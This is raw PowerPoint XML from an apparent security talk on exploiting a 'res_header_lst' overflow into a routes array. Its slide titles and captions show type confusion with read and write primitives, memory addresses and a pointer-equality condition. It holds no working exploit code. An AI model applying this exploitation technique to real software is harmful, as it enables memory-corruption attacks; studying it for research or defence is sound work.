                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181BC11A-E2A1-4046-AD4C-54ED5912E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107"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3792699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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Routes - Diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Routes data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57878591-F9F3-604A-9FB5-B2E117B82489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="102245" y="1206929"/>
            <a:ext cx="8273081" cy="2523991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5FE204-D1D3-CF4D-A4D8-E634BF211436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="4767" t="57754" r="86732" b="33043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5327542" y="2629234"/>
            <a:ext cx="940545" cy="276698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399787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84272" y="4372567"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="res_header_lst overflow into routes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02018268-249A-9945-916E-2C73E69A79DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1363851" y="64623"/>
            <a:ext cx="7780150" cy="3371398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944EC652-D1B8-D844-9362-4118D21CCF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="1611823"/>
            <a:ext cx="1580827" cy="4044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Routes data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2790EBE2-6644-5440-9651-FDC4CA1D4DBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="63114" t="37901" r="22274" b="53195"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393052" y="2385770"/>
            <a:ext cx="1208868" cy="224726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEE19866-9C6D-5C42-9BB2-839D7079F888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="4767" t="57754" r="86732" b="33043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404674" y="2791966"/>
            <a:ext cx="848533" cy="249629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3076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123501" y="4182613"/>
            <a:ext cx="8895058" cy="796667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="res_header_lst overflow into routes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02018268-249A-9945-916E-2C73E69A79DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1363851" y="64623"/>
            <a:ext cx="7780150" cy="3371398"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944EC652-D1B8-D844-9362-4118D21CCF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="1611823"/>
            <a:ext cx="1580827" cy="4044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ata within a route">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB97566-71F0-F243-8BA1-4043B7BD7EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038672" y="3508711"/>
            <a:ext cx="7097579" cy="796667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48F9B391-B453-654B-8C0E-873EA265D5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="2274978"/>
            <a:ext cx="2247254" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>﻿0x55555555e3b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75166E8-2781-6548-8485-2A2B7B883BCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="2686222"/>
            <a:ext cx="2247254" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>﻿﻿0x55555555e440</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5196528C-F42E-2C40-9603-A41ACDB944E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="3038245"/>
            <a:ext cx="2247254" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>﻿﻿0x55555555e4d0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8913FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="956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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Routes data structure">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F120A93-F2A9-0544-8188-12FC7A371327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="63114" t="37901" r="22274" b="53195"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393052" y="2385770"/>
            <a:ext cx="1208868" cy="224726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC92828F-7374-9547-9E65-0D7E3AD1B55B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="4767" t="57754" r="86732" b="33043"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404674" y="2791966"/>
            <a:ext cx="848533" cy="249629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1697310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1" y="4443261"/>
            <a:ext cx="8965769" cy="994172"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="res_header_lst overflow into routes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02018268-249A-9945-916E-2C73E69A79DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="35269"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1363851" y="64623"/>
            <a:ext cx="7780150" cy="2182321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944EC652-D1B8-D844-9362-4118D21CCF76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154265" y="1611823"/>
            <a:ext cx="1580827" cy="4044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8913FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9559"/>
            <a:ext cx="1797803" cy="243142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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not useful..</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D75C58E-54A7-424D-A168-56F208981D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677477" y="2302007"/>
            <a:ext cx="4661330" cy="2317347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F4ECD4B-B632-A648-BAA7-DF63DE629624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2092271"/>
            <a:ext cx="2681207" cy="20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6336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descr="Diagram, table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE2858BD-095B-6E47-8A9D-D40E69292708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069059" y="156012"/>
            <a:ext cx="8074941" cy="3859548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1" y="4443261"/>
            <a:ext cx="8965769" cy="994172"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8913FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9559"/>
            <a:ext cx="1797803" cy="2431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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7048F69C-E6A9-4E4D-8635-A622A759E339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917267" y="2502976"/>
            <a:ext cx="1655092" cy="122436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181FDBD-ED68-F44F-AE05-7E9CC3D6D650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1959242" y="2502976"/>
            <a:ext cx="1551123" cy="116801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262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1" y="4443261"/>
            <a:ext cx="8965769" cy="994172"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8913FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5067946" y="3733172"/>
            <a:ext cx="1797803" cy="2431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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BFADD72-78BE-1043-B41F-60C2B6CC490E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2495227"/>
            <a:ext cx="7886700" cy="2162014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0x20]-&gt;name == routes[0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hard to keep the party going…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E04B651-746F-8B40-9C29-B84D75FD02E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="-79302"/>
            <a:ext cx="1766806" cy="1241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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C9832B7-6A60-D14C-BD7D-F5AE0370F226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="47029"/>
            <a:ext cx="8660109" cy="2353290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9166543-D6B9-6444-944D-69773E182066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846447" y="984969"/>
